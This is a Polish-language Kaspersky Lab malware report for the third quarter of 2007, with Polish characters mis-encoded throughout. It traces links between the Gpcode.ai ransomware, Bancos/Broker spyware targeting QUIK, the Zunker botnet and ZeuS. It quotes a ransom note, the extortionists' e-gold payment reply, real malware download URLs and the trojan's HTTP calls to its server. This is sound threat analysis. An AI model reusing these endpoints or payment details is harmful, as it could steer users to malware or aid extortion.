Ewolucja szkodliwego oprogramowania: czerwiec - wrzesie艅 2007

Alexander Gostev
Starszy analityk wirus贸w, Kaspersky Lab

Vitaly Kamluk
Analityk wirus贸w, Kaspersky Lab

Trzeci kwarta艂 2007 nie by艂 tak obfity w wydarzenia jak oczekiwali艣my. Naturalnie szkodliwe programy nie znikn臋艂y, a tw贸rcy wirus贸w z pewno艣ci膮 nie zresocjalizowali si臋 z dnia na dzie艅. Mimo to zdarzenia zwi膮zane z zagro偶eniami wyst臋powa艂y na mniejsz膮 skal臋 ni偶 w poprzednich miesi膮cach czy latach.

Na osobie, kt贸ra pami臋ta globalne epidemie wywo艂ane przez robaki Mydoom i Lovesan, nieustaj膮cy strumie艅 niemal identycznych trojan贸w zalewaj膮cych Internet raczej nie zrobi du偶ego znaczenia. Na pierwszy rzut oka wygl膮da na to, 偶e szkodliwi u偶ytkownicy cierpi膮 na brak ambicji, zar贸wno je偶eli chodzi o skal臋 jak i innowacj臋. Istnieje jednak proste wyja艣nienie: cyberprzest臋pczo艣膰 staje si臋 biznesem, dlatego obecnie cyberprzest臋pcy pr贸buj膮 unika膰 "radar贸w". Epidemie wirusowe prowadz膮 do 艣ledztw wszczynanych przez organy 艣cigania. Ci po drugiej stronie barykady dzia艂aj膮 teraz zgodnie z has艂em, 偶e najwa偶niejsza jest dyskrecja, zachowuj膮c si臋 tak cicho i nienachalnie, jak to mo偶liwe. W takim klimacie znacz膮ce innowacje techniczne s膮 rzadko艣ci膮. Ugrupowania przest臋pcze preferuj膮 teraz wypr贸bowane techniki i struktury. O ich dzia艂aniach dowiadujemy si臋 zazwyczaj wtedy, gdy staj膮 si臋 nieostro偶ni. W tym wypadku pewn膮 rol臋 odgrywa chciwo艣膰 oraz niezbyt wielkie umiej臋tno艣ci techniczne.

Za co zapami臋tamy trzeci kwarta艂 2007 roku? Za liczne incydenty zwi膮zane z kradzie偶膮 danych u偶ytkownika. Za najnowszego trojana szanta偶yst臋. Masow膮 histeri臋 zwi膮zan膮 z rosyjsk膮 firm膮 Russian Business Network, nazywan膮 przez zwyk艂ych u偶ytkownik贸w 'Resident Evil' 艣wiata cybernetycznego.

Na tym tle informacja o wzrastaj膮cej liczbie botnet贸w zwi膮zanych z Zhelatinem (Storm Worm) pozosta艂a prawie niezauwa偶ona. Przeoczono nawet informacj臋 o tym, 偶e botnet robaka Storm sk艂ada si臋 z ponad 2 milion贸w maszyn.

Rzeczywista "linia frontu" zosta艂a przesuni臋ta na ca艂kowicie inny poziom - jednak media nic nie wspomina艂y o tym.

W trzecim kwartale 2007 roku wiele uwagi po艣wi臋cili艣my wydarzeniom, o kt贸rych donosi艂y media. Badanie jednego incydentu doprowadzi艂o nas do innych incydent贸w, kt贸re dopiero co zaczyna艂y si臋 wy艂ania膰; obserwatorowi z zewn膮trz wydarzenia te mog艂y wydawa膰 si臋 pozbawione zwi膮zku.

Najnowszy raport kwartalny nie jest standardowy. Opiera si臋 na danych pochodz膮cych z jednego, powa偶nego dochodzenia i nie tylko obejmuje istotne wydarzenia z ostatnich trzech miesi臋cy, ale r贸wnie偶 pokazuje, czym w艂a艣ciwie zajmuj膮 si臋 analitycy wirus贸w.

Powr贸t szanta偶ysty

Przez ponad rok nie by艂o nowych wiadomo艣ci o szyfruj膮cych koniach troja艅skich. W zesz艂ym roku w naszym artykule zatytu艂owanym "Szanta偶ysta" szczeg贸艂owo przedstawili艣my, w jaki spos贸b firmy antywirusowe zwalczaj膮 Gpcode'a, program wykorzystuj膮cy algorytm RSA w celu szyfrowania danych u偶ytkownika. W artykule przewidywali艣my, 偶e w przysz艂o艣ci pojawi si臋 wi臋ksza liczba takich program贸w. Jednak do nast臋pnego pojawienia si臋 programu szyfruj膮cego, w po艂owie lipca 2007 roku, min膮艂 prawie rok.

Mniej wi臋cej od 13 lipca niekt贸rzy u偶ytkownicy zacz臋li zauwa偶a膰, 偶e ich dokumenty, zdj臋cia, archiwa i pliki robocze przesta艂y si臋 otwiera膰 i zawiera艂y "cyfrowy 艣mietnik". Ponadto w ich systemach pojawi艂 si臋 plik o nazwie 'read_me.txt'. Niestety zawarto艣膰 tego pliku by艂a a偶 za dobrze nam znana:

Hello, your files are encrypted with RSA-4096 algorithm
(http://en.wikipedia.org/wiki/RSA).
You will need at least few years to decrypt these files without our
software. All your private information for last 3 months were
collected and sent to us.
To decrypt your files you need to buy our software. The price is $300.
To buy our software please contact us at: xxxxxxx@xxxxx.com and provide us
your personal code -XXXXXXXXX. After successful purchase we will send
your decrypting tool, and your private information will be deleted
from our system.
If you will not contact us until 07/15/2007 your private information
will be shared and you will lost all your data.
Glamorous team

[t艂umaczenie na j臋zyk polski: Witam, twoje pliki zosta艂y zaszyfrowane za pomoc膮 algorytmu RSA-4096 (http://en.wikipedia.org/wiki/RSA). Bez naszego oprogramowania b臋dziesz potrzebowa艂 przynajmniej kilku lat, aby odszyfrowa膰 te pliki. Przez co najmniej 3 miesi膮ce wszystkie twoje prywatne informacje by艂y zbierane i przesy艂ane do nas. Aby odszyfrowa膰 swoje pliki, musisz kupi膰 nasze oprogramowanie. Cena to 300 dolar贸w. Aby zakupi膰 nasze oprogramowanie, skontaktuj si臋 z nami na adres xxxxxxx@xxxxx.com, podaj膮c osobisty kod - XXXXXXXXX. Po skutecznym zakupie wy艣lemy ci twoje narz臋dzie deszyfruj膮ce, a twoje prywatne informacje zostan膮 usuni臋te z naszego systemu. Je艣li nie skontaktujesz si臋 z nami do 07/15/2007, twoje prywatne informacje zostan膮 udost臋pnione i utracisz wszystkie swoje dane. Zesp贸艂 Glamorous]

Czy偶by nieznany oszust powr贸ci艂? Analitycy wirus贸w z firmy Kaspersky Lab znali ju偶 ten adres email - u偶yto go w niekt贸rych wariantach trojana LdPinch oraz bankerach - trojanach o wyra藕nie rosyjskich powi膮zaniach.

Przeprowadzona przez nasz zesp贸艂 analiza zaszyfrowanych plik贸w pokaza艂a, 偶e w przeciwie艅stwie do tego, co podano w e-mailu, tw贸rcy wirus贸w nie wykorzystali algorytmu RSA-4096, ale modyfikacj臋 algorytmu RC4. To znacznie u艂atwi艂o nasze zadanie. W ci膮gu 24 godzin od wykrycia trojana szanta偶ysty zdo艂ali艣my z艂ama膰 klucz szyfruj膮cy i doda膰 do naszych antywirusowych baz danych procedury deszyfrowania dla plik贸w u偶ytkownika.

Analiza tej nowej wersji Gpcode'a pokaza艂a, 偶e szkodnik ten posiada wiele funkcji. Opr贸cz szyfrowania Gpcode potrafi艂 kra艣膰 dane u偶ytkownika z zaatakowanej maszyny, wysy艂a膰 je na serwer zdalnego u偶ytkownika oraz pobiera膰 z niego okre艣lone pliki.

Wszyscy zdawali艣my sobie spraw臋, 偶e trojany wymuszaj膮ce has艂a stanowi膮 powa偶ne zagro偶enie, i postanowili艣my bardziej szczeg贸艂owo zbada膰 najnowszy szkodliwy program o nazwie Gpcode.ai. Okaza艂o si臋, 偶e by艂a to bardzo trafna decyzja.

Na tropie Gpcode.ai

Postanowili艣my skupi膰 si臋 na trzech g艂贸wnych obszarach:

  1. serwerze, na kt贸ry trojan wysy艂a艂 dane i z kt贸rego pobiera艂 pliki
  2. adresie email podanym w wiadomo艣ci pozostawionej na zaatakowanych maszynach
  3. ci膮gu tekstowym zawartym w ciele trojana - "_SYSTEM_64AD0625_"

Serwer

Ustalili艣my, 偶e Gpcode.ai 艂膮czy艂 si臋 z serwerem za pomoc膮 umieszczonego tam skryptu s.php. Ponadto, pobiera艂 z serwera plik o nazwie cfg.bin. Plik ten stanowi艂 zaszyfrowany zestaw instrukcji dotycz膮cych tego, jakie informacje powinny zosta膰 przechwycone z zaatakowanej maszyny (dane o koncie dla szeregu system贸w p艂atniczych oraz bankowo艣ci).

Szkodnik ten analizowany by艂 przez kilka firm antywirusowych. Alarm podnie艣li przedstawiciele PrevX, kt贸rzy na serwerze szkodliwego u偶ytkownika wykryli pliki pochodz膮ce z 494 zaatakowanych maszyn. Firma ta poda艂a nast臋pnie do wiadomo艣ci, 偶e w艣r贸d ofiar szanta偶ysty znajdowa艂o si臋 wiele du偶ych firm. Mel Morris, dyrektor generalny PrevX, ujawni艂 nawet ich nazwy: American Airlines, Booz Allen Hamilton oraz Ameryka艅ski Departament Stanu. 呕adna z ofiar nie zdecydowa艂a si臋 skomentowa膰 decyzji Morrisa o ujawnieniu tych informacji.

Bran偶a nie pochwala艂a tego kroku PrevX. David Perry z Trend Micro powiedzia艂, 偶e postanowienie PrevX o ujawnieniu szczeg贸艂贸w zaniepokoi艂o jego firm臋. Najwi臋ksze firmy antywirusowe pr贸bowa艂y unika膰 podawania jakichkolwiek informacji (takich jak serwer czy adresy e-mail) dotycz膮cych szkodliwych u偶ytkownik贸w, zatajaj膮c te szczeg贸艂y r贸wnie偶 w publikowanych opisach wirusa (mimo 偶e nie zawsze im si臋 to udawa艂o - zobacz nasz weblog). Jednak PrevX zdradzi艂 ca艂emu 艣wiatu nie tylko to, gdzie mo偶na uzyska膰 dost臋p do prywatnych danych, ale r贸wnie偶 do kogo one nale偶膮.

Prawdziw膮 ob艂aw臋 prze偶ywa艂 martin-golf.net - odwiedzany przez ekspert贸w ds. bezpiecze艅stwa, haker贸w, przedstawicieli organ贸w 艣cigania z r贸偶nych pa艅stw, jak r贸wnie偶 zwyk艂ych ciekawskich. Badanie, kt贸re mog艂oby zosta膰 przeprowadzone, zosta艂o przerwane - szkodliwi u偶ytkownicy wiedzieli, 偶e s膮 obserwowani i pozwolili, aby obserwuj膮cy obserwowali obserwuj膮cych, a nie przest臋pc贸w.

Z tego powodu ta linia 艣ledztwa nie mog艂a przynie艣膰 rezultat贸w. Dlatego nasz膮 uwag臋 skierowali艣my na adres email.

Email

Chcieli艣my dowiedzie膰 si臋, jak dok艂adnie wygl膮da艂a korespondencja mi臋dzy cyberprzest臋pc膮 a u偶ytkownikiem sk艂onnym zap艂aci膰 pieni膮dze za przywr贸cenie swoich danych. Na jeden z adres贸w z programu troja艅skiego wys艂ali艣my wiec email o nast臋puj膮cej tre艣ci: "Nazywam si臋 John Brown. Moje wa偶ne dane zosta艂y zaszyfrowane. Dane te s膮 mi pilnie potrzebne do opracowania raportu. Je艣li go nie sko艅cz臋, m贸j szef mnie zabije". Nast臋pnego dnia otrzymali艣my nast臋puj膮c膮 odpowied藕 od nieznanego szkodliwego u偶ytkownika:

Sorry for delay.

Please transfer $500 to e-gold account 4616329 and send us a e-mail to
address oxyglamour@gmail.com. You can buy e-gold with paypal with help of
exchange site listed on official e-gold site (http://www.e- 
gold.com/unsecure/links.htm#marketmaker).
After that, we will send your personal decoding program immediately

[t艂umaczenie na j臋zyk polski: Przepraszam za zw艂ok臋. Prosz臋 o przelanie 500 dolar贸w na konto e-gold nr 4616329 oraz wys艂anie wiadomo艣ci email na adres oxyglamour@gmail.com. Mo偶esz kupi膰 e-gold za pomoc膮 paypala za po艣rednictwem strony wymienionej na oficjalnej stronie e-gold (http://www.e-gold.com/unsecure/links.htm#marketmaker)].

Jak wida膰 z powy偶szego tekstu, autorzy Gpcode.ai nie prosili o 300 dolar贸w - jak 偶膮dano w wiadomo艣ci pozostawionej przez trojana - ale o 500 dolar贸w. Pieni膮dze te mia艂y zosta膰 przelane za po艣rednictwem e-gold, ulubionego systemu p艂atno艣ci cyberprzest臋pc贸w. Ponadto zosta艂 podany numer konta, na kt贸re nale偶a艂o przela膰 pieni膮dze.

Wraz z tym mailem ta linia 艣ledztwa utkn臋艂a w martwym punkcie.

Ci膮g "_SYSTEM_64AD0625_"

Jedyn膮 rzecz膮, jaka pozosta艂a, by艂o ustalenie, jakie inne szkodliwe programy mog艂y zosta膰 stworzone przez grup臋 przedstawiaj膮c膮 si臋 jako "Glamourous team". Zacz臋li艣my wi臋c przeszukiwa膰 nasz膮 kolekcj臋 wirus贸w w celu znalezienia nast臋puj膮cego ci膮gu: "_SYSTEM_64AD0625_"

Rezultaty by艂y zaskakuj膮ce. Muteks ten znale藕li艣my w wielu r贸偶nych rodzajach trojan贸w - trojanach downloaderach, trojanach szpieguj膮cych oraz backdoorach.

Wsp贸ln膮 cech膮 wszystkich tych pr贸bek by艂a nazwa pliku, kt贸ry szkodliwe programy zainstalowa艂y na zaatakowanej maszynie: ntos.exe, dok艂adnie tej samej nazwy pliku u偶ywa艂 Gpcode.ai. Opr贸cz tego, szkodliwe programy znalezione w kolekcji zawiera艂y pliki o nazwie sporder.dll oraz rsvp322.dll i tworzy艂y podkatalog o nazwie wsnpoem, zawieraj膮cy pliki o nazwach audio.dll oraz video.dll w katalogu systemu Windows.

Szczeg贸艂owa analiza wybranych plik贸w pokaza艂a, 偶e opr贸cz tego, 偶e zawiera艂y one ten sam muteks, ich kod by艂 w ponad 80% identyczny!

"Uniwersalny" kod

Wydawa艂o si臋, 偶e natrafili艣my na uniwersalny kod. Kod ten mia艂 na celu nie tylko kradzie偶 danych oraz instalowanie nowych trojan贸w na zaatakowanej maszynie. Mia艂 r贸wnie偶 dzia艂a膰 jak bot i przy艂膮cza膰 zaatakowan膮 maszyn臋 do sieci zombie.

Szkodliwe programy wykorzystuj膮ce ten "uniwersalny" kod posiada艂y pojedynczy komponent oraz niewielk膮 (w por贸wnaniu z ca艂kowitym rozmiarem pliku), unikatow膮 funkcj臋 r贸偶ni膮c膮 si臋 w zale偶no艣ci od wersji. Interesuj膮ce jest to, 偶e niekt贸re z tych program贸w wykryli艣my jeszcze pod koniec 2006 r. Przy pomocy tego "uniwersalnego" kodu stworzono r贸wnie偶 Gpcode.ai.

Nowe wpisy i zale偶no艣ci mi臋dzy nimi znacznie rozszerzy艂y diagramy, kt贸re wykorzystywali艣my w naszym 艣ledztwie.




Z艂a firma

Kolejnym etapem w naszym badaniu by艂o przeanalizowanie odsy艂aczy w pr贸bkach zawieraj膮cych "uniwersalny" kod. Z wykrytego niedawno pliku wydobyli艣my cztery odsy艂acze - odsy艂acze, kt贸re pos艂u偶y艂y szkodliwemu programowi do dostarczenia swojej szkodliwej funkcji:

http://81.95.149.28/logo/zeus.exe
http://81.95.149.28/logo/zupa.exe
http://myscreensavers.info/zupa.exe
http:/81.95.149.28/logo/fout.php

Co robi ten trojan? Przede wszystkim instaluje si臋 na zaatakowanej maszynie jako ntos.exe, nast臋pnie pobiera pliki o nazwie zeus.exe (http://81.95.149.28/logo/zeus.exe) oraz zupa.exe (http://81.95.149.28/logo/zupa.exe), 艂膮cz膮c si臋 poprzez skrypt o nazwie fout.pho (http:/81.95.149.28/logo/fout.php) w celu zidentyfikowania siebie w botnecie. Trojan pobiera cfg.bin, zaszyfrowany plik konfiguracyjny. Plik ten zawiera wiadomo艣膰 tekstow膮 oraz odsy艂acze do innych stron. Nast臋pnie szkodnik zaczyna 艣ledzi膰 aktywno艣膰 u偶ytkownika i gdy ten odwiedzi jakiekolwiek fora, ksi臋gi go艣ci czy blogi, trojan do艂膮cza sw贸j w艂asny tekst (wydobyty z cfg.bin i zawieraj膮cy odsy艂acze do szkodliwego pliku (http://myscreensavers.info/zupa.exe)) do wiadomo艣ci u偶ytkownika:



Skorzystali艣my z Google, aby znale藕膰 podobne przyk艂ady... bez trudu trafili艣my na wiele:



Konstruowanie ataku w ten spos贸b pozwala autorom trojan贸w wykorzysta膰 zainfekowane wcze艣niej maszyny w celu rozprzestrzeniania nowych wariant贸w szkodliwego programu i/lub zwi臋kszenia liczby zainfekowanych komputer贸w. Przyk艂ad ten jasno pokazuje, w jaki spos贸b szkodliwi u偶ytkownicy odchodz膮 od tradycyjnych wektor贸w infekcji (np. wysy艂anie szkodliwych program贸w za po艣rednictwem poczty elektronicznej), wykorzystuj膮c do rozprzestrzeniania swoich twor贸w moc Internetu.

Jakie szkodliwe programy wykorzystywa艂 do rozprzestrzeniania si臋 analizowany przez nas trojan? Poni偶sze dane ukazuj膮 interesuj膮cy obraz:



S膮 to oddzielne rodziny. Na pierwszy rzut oka nie maj膮 ze sob膮 nic wsp贸lnego i z pocz膮tku s膮dzono, 偶e zosta艂y napisane przez r贸偶ne grupy tw贸rc贸w szkodliwego oprogramowania. Jednak rozprzestrzenia艂y si臋 z tej samej strony i przy pomocy tego samego trojana downloadera. Co wi臋cej w pewien spos贸b s膮 one zwi膮zane z trojanem Gpcode.ai!

Do ko艅ca nie by艂o wiadomo, co to znaczy. Zacz臋li艣my podejrzewa膰 istnienie mi臋dzynarodowej grupy zamieszanej w tworzenie i rozprzestrzenianie ogromnej wi臋kszo艣ci dzisiejszych szkodliwych program贸w.

Nasze najgorsze obawy potwierdzi艂y si臋, gdy przeanalizowali艣my botnet, kt贸ry zosta艂 stworzony przy u偶yciu Bzuba. Sta艂o si臋 jasne, 偶e trojan, nazwany przez swojego autora Zupacha, by艂 bezpo艣rednim krewnym Bzuba. Bzub oraz Zupach to prawie identyczne programy, jednak Bzub posiada funkcj臋 trojana szpieguj膮cego, Zupacha natomiast jej nie posiada.

Bzub/ Zupacha s膮 klientami bota zarz膮dzanymi przez system botnetu Zunker.

Istnieje jeszcze inny szkodliwy program zwi膮zany z botnetem Zunker: Email-Worm.Win32.Zhelatin.bg. Jest to jeden ze s艂awnych robak贸w Storm, kt贸re od pocz膮tku 2007 roku zalewaj膮 ruch pocztowy. W celu rozprzestrzeniania si臋 robaki te wykorzystuj膮 zaawansowane metody socjotechniki.

Podsumowuj膮c: Zhelatin, Warezov, Bancos.aam, Bzub, a teraz Gpcode.ai s膮 ze sob膮 powi膮zane. Programy te pochodz膮 z r贸偶nych rodzin, jednak rodziny te nale偶膮 do jednych z najaktywniejszych i najniebezpieczniejszych szkodliwych program贸w w tym momencie. Pliki o takich nazwach, jak ntos.exe, video.dll, audio.dll, sporder.dll, lcewza.exe, filech.exe, filede.exe, iphone.scr, ldr.exe, ldr2.exe, loader.exe, pajero.exe, update92520748.exe, zeus.exe, zs1.exe s膮 dobrze znane analitykom wirus贸w na ca艂ym 艣wiecie.

Powi膮zania mi臋dzy trojanami przedstawiaj膮 si臋 w nast臋puj膮cy spos贸b:



W czasie gdy prowadzili艣my nasze dochodzenie, nieznani szkodliwi u偶ytkownicy stali si臋 ca艂kowicie znani. M贸wi膮c 艣ci艣lej, nie pr贸bowali zwr贸ci膰 na siebie uwagi, jednak wydarzenia, jakie nast膮pi艂y, okaza艂y si臋 bardzo znacz膮ce.


Broker

25 lipca 2007 r. (zaledwie 10 dni po pojawieniu si臋 Gpcode.ai) analitycy z firmy Kaspersky Lab zauwa偶yli aktywne rozprzestrzenianie si臋 nowego szkodliwego programu. Jego ofiar膮 padli u偶ytkownicy kilku najpopularniejszych rosyjskich stron informacyjnych - utro.ru, gzt.ru, rbc.ru.

Sta艂o si臋 jasne, 偶e otworzyli oni odsy艂acz (http://www.txt.utro.ru/cgi- bin/banner/rian?86028&options=FN) w systemie banerowym Utro.ru, kt贸ry zawiera艂 odsy艂acz do zainfekowanej strony (http://81.95.145.210/333/m00333/index.php). Stron臋 t臋 hostowa艂a firma RBN (Russian Business Network).

Po otwarciu tej strony, przegl膮darka u偶ytkownika by艂a atakowana przy u偶yciu kolekcji eksploit贸w (w tym przypadku, Mpack). Gdyby atak powi贸d艂 si臋, na zaatakowan膮 maszyn臋 zosta艂by pobrany trojan downloader. Program ten zainstalowa艂by z kolei inny szkodliwy program - Trojan-Spy.Win32.Bancos.aam.

Po zainstalowaniu si臋 w systemie trojan zacz膮艂by wykonywa膰 nast臋puj膮ce polecenia:

Host: 81.95.149.66
GET /e1/file.php HTTP/1.1
GET /ldr1.exe HTTP/1.1
GET /cfg.bin HTTP/1.0
POST /s.php?1=april_002fdf3f&i= HTTP/1.0

W rezultacie, na zaatakowanej maszynie pojawi艂by si臋 plik o nazwie ntos.exe (nazwa dobrze znana analitykom wirus贸w). Plik ten wykorzystywany by艂 do instalowania Gpcode.ai w systemie. Spodziewaj膮c si臋 najgorszego, w postaci nowego programu szyfruj膮cego, zacz臋li艣my szczeg贸艂owo analizowa膰 ten plik.

Okaza艂o si臋 jednak, 偶e program ten nie jest wariantem Gpcode. Ta nowa wersja Bancos.aam by艂a pierwszym trojanem szpieguj膮cym stworzonym w celu kradzie偶y danych u偶ytkownik贸w rosyjskiego systemu QUIK.

QUIK jest pakietem aplikacji zapewniaj膮cym dost臋p online do system贸w gie艂d papier贸w warto艣ciowych. Sk艂ada si臋 z aplikacji po stronie serwera oraz terminala po stronie klienta, kt贸re komunikuj膮 si臋 ze sob膮 za po艣rednictwem Internetu.

Uzyskiwanie przez cyberprzest臋pc贸w dost臋pu do kont bankowych to zjawisko wyst臋puj膮ce ju偶 od d艂u偶szego czasu. Jednak kradzie偶 danych umo偶liwiaj膮cych dost臋p do internetowych gie艂d papier贸w warto艣ciowych to co艣 nowego.

Trojan ten skanowa艂 zaatakowan膮 maszyn臋 w poszukiwaniu plik贸w o nazwie secring.txk, pubring.txk oraz qcrypto.cfg zawieraj膮cych zapisane parametry dost臋pu do systemu QUIK. Dane z tych plik贸w wysy艂ane by艂y nast臋pnie z powrotem na serwer.

Wiedz膮c dok艂adnie, jakich plik贸w szuka艂 program szpieguj膮cy, po raz kolejny przeszukali艣my nasz膮 kolekcje wirus贸w. Znale藕li艣my kolejne pi臋膰 wariant贸w trojana, z kt贸rych pierwszy pochodzi艂 z pocz膮tk贸w lipca. W rezultacie, wszystkie te programy zosta艂y zaklasyfikowane do nowej rodziny o nazwie Trojan-PSW.Win32.Broker.

Trojany te wykazywa艂y zadziwiaj膮ce podobie艅stwo do trojana Gpcode.ai pod wzgl臋dem kodu. R贸偶nice polega艂y na tym, 偶e jeden krad艂 dane, drugi szyfrowa艂 dane. Po raz kolejny natrafili艣my na "uniwersalny" kod.


Wst臋pne wyniki

Do pierwszego sierpnia ustalili艣my nast臋puj膮ce fakty:

  • Gpcode.ai wykorzystywa艂 "uniwersalny" kod i kontaktowa艂 si臋 ze stron膮 martin-golf.net
  • Bancos.aam wykorzystywa艂 "uniwersalny" kod i pobiera艂 pliki hostingowane przez firm臋 Russian Business Network (RBN)
  • Niekt贸re z botnet贸w Zunkera, kt贸re ju偶 wykryli艣my, by艂y hostingowane w zasobach RBN
  • Botnety Zunkera dzia艂aj膮 jak centra dowodzenia dla downloader贸w, kt贸re pobieraj膮 programy podobne do Bancos.aam/Gpcode.ai
  • W艣r贸d szkodliwych program贸w, kt贸re mog膮 by膰 zarz膮dzane przez Zunkera, znajduje si臋 downloader Zunker, program szpieguj膮cy Bzub i prawdopodobnie robak Zhelatin (Storm)
  • Jeden z takich botnet贸w zosta艂 wykorzystany do rozprzestrzeniania robaka Warezov

Wci膮偶 jednak brakowa艂o nam jednego kawa艂ka uk艂adanki - kim by艂 autor "uniwersalnego" kodu, tak powszechnie wykorzystywanego w tak wielu r贸偶nych szkodliwych programach? Czy za te wszystkie incydenty odpowiedzialna by艂a ta sama grupa tw贸rc贸w wirus贸w?

Wiele czasu po艣wi臋cili艣my na czytanie r贸偶nych stron oraz for贸w hakerskich, w wi臋kszo艣ci w j臋zyku rosyjskim. Stopniowo sytuacja zaczyna艂a si臋 wyja艣nia膰.


W poszukiwaniu "uniwersalnego" kodu

Zunker oraz Zupacha

Czym wi臋c zajmowali艣my si臋 przez ca艂y ten czas? Strony hakerskie aktywnie sprzedawa艂y pakiet Zunker+Zupacha - centrum dowodzenia botnetu oraz klient bota. To ju偶 wiedzieli艣my. Interesuj膮cym odkryciem by艂o to, ile pieni臋dzy nieznani autorzy systemu bota 偶膮dali za sw贸j pakiet: do 3000 dolar贸w. Od czasu do czasu pojawia艂y si臋 oferty "dwa w jednej cenie" w wysoko艣ci oko艂o 200 dolar贸w. Takie oferty sk艂adali prawdopodobnie inni w艂a艣ciciele kodu 藕r贸d艂owego pakietu trojan贸w.

My jednak nie mieli艣my 偶adnych problem贸w z uzyskaniem plik贸w Zunkera oraz Zupacha za darmo, znaj膮c adresy niekt贸rych aktywnych botnet贸w. Wystarczy艂o skorzysta膰 z Google.

Funkcje Zupacha okaza艂y si臋 gro藕ne. Opr贸cz pobierania plik贸w na zaatakowan膮 maszyn臋, g艂贸wnym zadaniem tego programu jest dalsze rozprzestrzenianie si臋. Opisali艣my ju偶 jeden ze sposob贸w jego rozprzestrzeniania si臋 (poprzez zamieszczanie swoich tekst贸w w wiadomo艣ciach na forach). Og贸lnie, Zupacha potrafi rozsy艂a膰 swoje odsy艂acze przy u偶yciu technik spamowych w nast臋puj膮cy spos贸b:

  • Spam ICQ/Jabber: Teksty z odsy艂aczami do zainfekowanych stron dodawane s膮 do wszystkich wiadomo艣ci, kt贸re ofiara wymienia ze swoimi kontaktami za po艣rednictwem tych klient贸w komunikator贸w internetowych.
  • Spam WWW: Teksty dodawane s膮 do ka偶dego formularza internetowego wype艂nionego przez u偶ytkownika. Z regu艂y s膮 to formularze znajduj膮ce si臋 na forach oraz interfejsach sieciowych system贸w pocztowych.
  • Spam email: Teksty dodawane s膮 do wiadomo艣ci email.

Nale偶y zauwa偶y膰, 偶e w zaprezentowanych wy偶ej przypadkach Zupacha nie inicjuje masowej wysy艂ki wiadomo艣ci. Monitoruje jedynie aktywno艣膰 u偶ytkownika i dodaje swoje teksty do ka偶dej wiadomo艣ci wychodz膮cej - w taki spos贸b, 偶eby u偶ytkownik ich nie zauwa偶y艂! Celem tej funkcji jest utrudnienie wykrycia infekcji.

Jednak Zupacha nie kradnie danych - jest to jedynie samodzielnie rozprzestrzeniaj膮cy si臋 trojan downloader. Dlatego te偶, nie mo偶e by膰 nies艂awnym "uniwersalnym" kodem.

Odpowied藕 na nasze pytanie otrzymali艣my po dalszej analizie ofert haker贸w dotycz膮cych szkodliwych program贸w: "uniwersalny" kod, kt贸ry zosta艂 wykorzystany w setkach wariant贸w Bancos.aam, Gpcode.ai oraz Broker okaza艂 si臋 botem ZeuS (nazwa u偶yta przez samego autora).


ZeuS - Zbot

Zgromadzone przez nas dane dotycz膮ce wariant贸w ZeuS, kt贸re ju偶 posiadali艣my, plus dochodzenia przeprowadzone w Internecie, pozwoli艂y nam uzyska膰 prawie pe艂ny obraz tego programu.

Zacznijmy od faktu, 偶e bot zosta艂 pierwotnie stworzony w celu odsprzeda偶y ka偶demu, kto chcia艂by go kupi膰, oraz skonfigurowania zgodnie z 偶yczeniami klienta. Autor programu nie oferowa艂 "wsparcia technicznego" osobom, kt贸re go zakupi艂y, zlecaj膮c t膮 funkcj臋 innym. Po rozg艂osie wok贸艂 Gpcode.ai oraz Broker wydaje si臋, 偶e autor uzna艂, 偶e jego tw贸r za bardzo zwr贸ci艂 na siebie uwag臋 i organy 艣cigania wykazywa艂y zbyt wielkie zainteresowanie nim. Og艂osi艂 wi臋c, 偶e sprzeda偶 programu zosta艂a zako艅czona.



Powy偶szy zrzut ekranu pokazuje rozmow臋, w kt贸rej autor programu wyja艣nia, 偶e program nie jest ju偶 na sprzeda偶, jednak "starzy klienci" nadal b臋d膮 otrzymywali wsparcie.

Historia ta przypomina zdarzenia, jakie mia艂y miejsce pod koniec zesz艂ego roku, gdy na skutek incydent贸w zwi膮zanych z kradzie偶膮 danych klient贸w banku Nordea us艂yszeli艣my o trojanie Nuclear Grabber z bardzo podobn膮 funkcjonalno艣ci膮. Na pewnym etapie trojan ten by艂 sprzedawany za 3 000 dolar贸w, a jego autor, Corpse, udzieli艂 nawet wywiadu jednemu z dziennikarzy. Corpse og艂osi艂 nast臋pnie na swojej stronie, 偶e "wycofuje si臋 z biznesu", 偶e ca艂y kod 藕r贸d艂owy zosta艂 zniszczony wraz z dyskiem twardym i 偶e nie b臋dzie ju偶 d艂u偶ej tworzy艂 ani wspiera艂 szkodliwych program贸w.

W przypadku ZeuS, scenariusz by艂 bardzo podobny. Mimo 偶e pod koniec lipca autor zamkn膮艂 sklep, konstruktor nadal kr膮偶y艂 w艣r贸d haker贸w. Umo偶liwia艂 on tworzenie nowych wariant贸w bota z okre艣lonymi funkcjami. Kilka rywalizuj膮cych ze sob膮 grup zacz臋艂o sprzedawa膰 i rozprzestrzenia膰 te nowe warianty.

Pocz膮tkowo ZeuS posiada艂 stosunkowo ograniczon膮 funkcjonalno艣膰 bota - pobiera艂 jedynie inne pliki do systemu. Z czasem jednak jego funkcjonalno艣膰 zosta艂a rozszerzona. Nie wiemy, czy dokona艂 tego sam autor, czy te偶 te nowe funkcje zaimplementowali nowi "w艂a艣ciciele" kodu 藕r贸d艂owego. Najistotniejsz膮 innowacj膮 by艂o pojawienie si臋 uniwersalnego "interfejsu" w ZeuS, kt贸ry pozwala艂 programowi na 艂膮czenie si臋 z botnetem Zunker (podobnie jak Zupacha), otrzymywanie instrukcji za po艣rednictwem pliku cfg.bin i wykonywanie ich w locie.

Stworzyli艣my program do deszyfrowania niekt贸rych plik贸w cfg.bin. Okaza艂o si臋, 偶e pliki te zawiera艂y adresy online r贸偶nych bank贸w i system贸w p艂atno艣ci. W艂a艣ciciele botnetu mogli szybko doda膰 adresy nowych cel贸w, aby 艣ledzi膰 aktywno艣膰 u偶ytkownika i przechwytywa膰 dane.

Opr贸cz standardowych procedur (takich jak instalowanie si臋 na zaatakowanej maszynie, wstrzykiwanie w艂asnego kodu do uruchamianych proces贸w, zwalczanie niekt贸rych rozwi膮za艅 antywirusowych), bot posiada艂 r贸wnie偶 rozbudowan膮 funkcjonalno艣膰 kradzie偶y danych:

  • Trojan przechwytuje zawarto艣膰 Pami臋ci Chronionej (Protected Storage), kt贸ra zawiera zapisane has艂a u偶ytkownika.
  • "Form grabber". Trojan przechwytuje wszystkie dane wprowadzane do formularza przesy艂anego za po艣rednictwem przegl膮darki. Lista monitorowanych adres贸w sk艂ada si臋, z regu艂y, z bank贸w i system贸w p艂atno艣ci. W ten spos贸b kradzione s膮 konta bankowe.
